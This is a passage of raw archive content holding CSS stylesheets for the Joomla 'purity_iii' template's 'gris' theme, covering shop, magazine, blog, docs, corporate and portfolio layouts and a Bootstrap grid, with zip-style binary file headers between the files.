  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #454444;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #454444;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 20px 0 0;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 20px 20px 0 !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .right .cart div input[type="text"],
.com_mijoshop .product-info .right .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .right .cart div input[type="text"] {
  padding-left: 5px;
  padding-right: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
  padding: 10px 10px 10px 0;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKԜ�\v�v��5purity_iii/local/css/themes/gris/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  content: " ";
  display: table;
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
  top: -1px;
  left: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #454444;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-right: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKԜ�\��V((1purity_iii/local/css/themes/gris/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-right: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #1e1e1e;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKԜ�\�.���1purity_iii/local/css/themes/gris/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #454444;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKԜ�\�.��6purity_iii/local/css/themes/gris/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKԜ�\j�e�!!5purity_iii/local/css/themes/gris/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #454444;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../../../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  right: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKԜ�\;purity_iii/local/css/themes/gris/layouts/features-intro.cssnu&1i�PKԜ�\��c�[�[.purity_iii/local/css/themes/gris/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: 1px dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  -moz-box-sizing: content-box;
  -webkit-box-sizing: content-box;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    background: transparent !important;
    color: #000 !important;
    box-shadow: none !important;
    text-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  select {
    background: #fff !important;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #454444;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #1e1e1e;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0px;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  margin: -1px;
  padding: 0;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0px;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0px;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: bold;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  word-break: break-all;
  word-wrap: break-word;
  color: #444444;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0px;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 768px) {
  .container {
    width: 750px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 970px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1170px;
  }
}
.container-fluid {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}
.row {
  margin-left: -15px;
  margin-right: -15px;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: left;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  right: 100%;
}
.col-xs-pull-11 {
  right: 91.66666667%;
}
.col-xs-pull-10 {
  right: 83.33333333%;
}
.col-xs-pull-9 {
  right: 75%;
}
.col-xs-pull-8 {
  right: 66.66666667%;
}
.col-xs-pull-7 {
  right: 58.33333333%;
}
.col-xs-pull-6 {
  right: 50%;
}
.col-xs-pull-5 {
  right: 41.66666667%;
}
.col-xs-pull-4 {
  right: 33.33333333%;
}
.col-xs-pull-3 {
  right: 25%;
}
.col-xs-pull-2 {
  right: 16.66666667%;
}
.col-xs-pull-1 {
  right: 8.33333333%;
}
.col-xs-pull-0 {
  right: auto;
}
.col-xs-push-12 {
  left: 100%;
}
.col-xs-push-11 {
  left: 91.66666667%;
}
.col-xs-push-10 {
  left: 83.33333333%;
}
.col-xs-push-9 {
  left: 75%;
}
.col-xs-push-8 {
  left: 66.66666667%;
}
.col-xs-push-7 {
  left: 58.33333333%;
}
.col-xs-push-6 {
  left: 50%;
}
.col-xs-push-5 {
  left: 41.66666667%;
}
.col-xs-push-4 {
  left: 33.33333333%;
}
.col-xs-push-3 {
  left: 25%;
}
.col-xs-push-2 {
  left: 16.66666667%;
}
.col-xs-push-1 {
  left: 8.33333333%;
}
.col-xs-push-0 {
  left: auto;
}
.col-xs-offset-12 {
  margin-left: 100%;
}
.col-xs-offset-11 {
  margin-left: 91.66666667%;
}
.col-xs-offset-10 {
  margin-left: 83.33333333%;
}
.col-xs-offset-9 {
  margin-left: 75%;
}
.col-xs-offset-8 {
  margin-left: 66.66666667%;
}
.col-xs-offset-7 {
  margin-left: 58.33333333%;
}
.col-xs-offset-6 {
  margin-left: 50%;
}
.col-xs-offset-5 {
  margin-left: 41.66666667%;
}
.col-xs-offset-4 {
  margin-left: 33.33333333%;
}
.col-xs-offset-3 {
  margin-left: 25%;
}
.col-xs-offset-2 {
  margin-left: 16.66666667%;
}
.col-xs-offset-1 {
  margin-left: 8.33333333%;
}
.col-xs-offset-0 {
  margin-left: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: left;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    right: 100%;
  }
  .col-sm-pull-11 {
    right: 91.66666667%;
  }
  .col-sm-pull-10 {
    right: 83.33333333%;
  }
  .col-sm-pull-9 {
    right: 75%;
  }
  .col-sm-pull-8 {
    right: 66.66666667%;
  }
  .col-sm-pull-7 {
    right: 58.33333333%;
  }
  .col-sm-pull-6 {
    right: 50%;
  }
  .col-sm-pull-5 {
    right: 41.66666667%;
  }
  .col-sm-pull-4 {
    right: 33.33333333%;
  }
  .col-sm-pull-3 {
    right: 25%;
  }
  .col-sm-pull-2 {
    right: 16.66666667%;
  }
  .col-sm-pull-1 {
    right: 8.33333333%;
  }
  .col-sm-pull-0 {
    right: auto;
  }
  .col-sm-push-12 {
    left: 100%;
  }
  .col-sm-push-11 {
    left: 91.66666667%;
  }
  .col-sm-push-10 {
    left: 83.33333333%;
  }
  .col-sm-push-9 {
    left: 75%;
  }
  .col-sm-push-8 {
    left: 66.66666667%;
  }
  .col-sm-push-7 {
    left: 58.33333333%;
  }
  .col-sm-push-6 {
    left: 50%;
  }
  .col-sm-push-5 {
    left: 41.66666667%;
  }
  .col-sm-push-4 {
    left: 33.33333333%;
  }
  .col-sm-push-3 {
    left: 25%;
  }
  .col-sm-push-2 {
    left: 16.66666667%;
  }
  .col-sm-push-1 {
    left: 8.33333333%;
  }
  .col-sm-push-0 {
    left: auto;
  }
  .col-sm-offset-12 {
    margin-left: 100%;
  }
  .col-sm-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-left: 75%;
  }
  .col-sm-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-left: 50%;
  }
  .col-sm-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-sm-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-left: 25%;
  }
  .col-sm-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: left;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    right: 100%;
  }
  .col-md-pull-11 {
    right: 91.66666667%;
  }
  .col-md-pull-10 {
    right: 83.33333333%;
  }
  .col-md-pull-9 {
    right: 75%;
  }
  .col-md-pull-8 {
    right: 66.66666667%;
  }
  .col-md-pull-7 {
    right: 58.33333333%;
  }
  .col-md-pull-6 {
    right: 50%;
  }
  .col-md-pull-5 {
    right: 41.66666667%;
  }
  .col-md-pull-4 {
    right: 33.33333333%;
  }
  .col-md-pull-3 {
    right: 25%;
  }
  .col-md-pull-2 {
    right: 16.66666667%;
  }
  .col-md-pull-1 {
    right: 8.33333333%;
  }
  .col-md-pull-0 {
    right: auto;
  }
  .col-md-push-12 {
    left: 100%;
  }
  .col-md-push-11 {
    left: 91.66666667%;
  }
  .col-md-push-10 {
    left: 83.33333333%;
  }
  .col-md-push-9 {
    left: 75%;
  }
  .col-md-push-8 {
    left: 66.66666667%;
  }
  .col-md-push-7 {
    left: 58.33333333%;
  }
  .col-md-push-6 {
    left: 50%;
  }
  .col-md-push-5 {
    left: 41.66666667%;
  }
  .col-md-push-4 {
    left: 33.33333333%;
  }
  .col-md-push-3 {
    left: 25%;
  }
  .col-md-push-2 {
    left: 16.66666667%;
  }
  .col-md-push-1 {
    left: 8.33333333%;
  }
  .col-md-push-0 {
    left: auto;
  }
  .col-md-offset-12 {
    margin-left: 100%;
  }
  .col-md-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-left: 75%;
  }
  .col-md-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-left: 50%;
  }
  .col-md-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-left: 25%;
  }
  .col-md-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: left;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    right: 100%;
  }
  .col-lg-pull-11 {
    right: 91.66666667%;
  }
  .col-lg-pull-10 {
    right: 83.33333333%;
  }
  .col-lg-pull-9 {
    right: 75%;
  }
  .col-lg-pull-8 {
    right: 66.66666667%;
  }
  .col-lg-pull-7 {
    right: 58.33333333%;
  }
  .col-lg-pull-6 {
    right: 50%;
  }
  .col-lg-pull-5 {
    right: 41.66666667%;
  }
  .col-lg-pull-4 {
    right: 33.33333333%;
  }
  .col-lg-pull-3 {
    right: 25%;
  }
  .col-lg-pull-2 {
    right: 16.66666667%;
  }
  .col-lg-pull-1 {
    right: 8.33333333%;
  }
  .col-lg-pull-0 {
    right: auto;
  }
  .col-lg-push-12 {
    left: 100%;
  }
  .col-lg-push-11 {
    left: 91.66666667%;
  }
  .col-lg-push-10 {
    left: 83.33333333%;
  }
  .col-lg-push-9 {
    left: 75%;
  }
  .col-lg-push-8 {
    left: 66.66666667%;
  }
  .col-lg-push-7 {
    left: 58.33333333%;
  }
  .col-lg-push-6 {
    left: 50%;
  }
  .col-lg-push-5 {
    left: 41.66666667%;
  }
  .col-lg-push-4 {
    left: 33.33333333%;
  }
